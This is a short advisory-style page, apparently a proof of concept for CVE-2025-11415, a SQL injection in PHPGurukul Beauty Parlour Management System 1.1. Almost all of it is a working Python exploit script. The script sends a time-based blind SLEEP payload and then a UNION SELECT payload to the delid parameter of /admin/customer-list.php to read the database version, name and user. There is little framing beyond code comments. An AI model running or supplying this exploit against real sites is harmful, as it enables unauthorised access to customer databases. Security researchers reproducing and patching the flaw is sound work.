CVE-2025-11415：PHPGurukul美容院管理系统SQL注入漏洞

# CVE-2025-11415 PoC - SQL Injection in PHPGurukul Beauty Parlour Management System 1.1 # Vulnerable file: /admin/customer-list.php # Vulnerable parameter: delid import requests import sys TARGET_URL = "http://target.com" # Replace with actual target VULNERABLE_PATH = "/admin/customer-list.php" # Normal request to verify the endpoint is accessible def check_vulnerable(base_url): url = base_url + VULNERABLE_PATH # Test for SQL injection using time-based blind technique payload_normal = {"delid": "1"} payload_inject = {"delid": "1' AND SLEEP(5)-- -"} try: # Send normal request r1 = requests.get(url, params=payload_normal, timeout=10) # Send injection request (should take longer due to SLEEP) r2 = requests.get(url, params=payload_inject, timeout=15) if r2.elapsed.total_seconds() - r1.elapsed.total_seconds() >= 4: print("[+] Target appears vulnerable to SQL injection!") return True else: print("[-] Target does not appear vulnerable.") return False except Exception as e: print(f"[!] Error: {e}") return False # Extract data using UNION-based injection def extract_data(base_url): url = base_url + VULNERABLE_PATH # Example UNION-based payload to extract database version # Adjust column count based on actual query structure payload = { "delid": "-1' UNION SELECT 1,version(),database(),user(),5,6,7,8,9,10-- -" } try: r = requests.get(url, params=payload, timeout=10) print("[+] Response:") print(r.text) except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] if check_vulnerable(TARGET_URL): extract_data(TARGET_URL)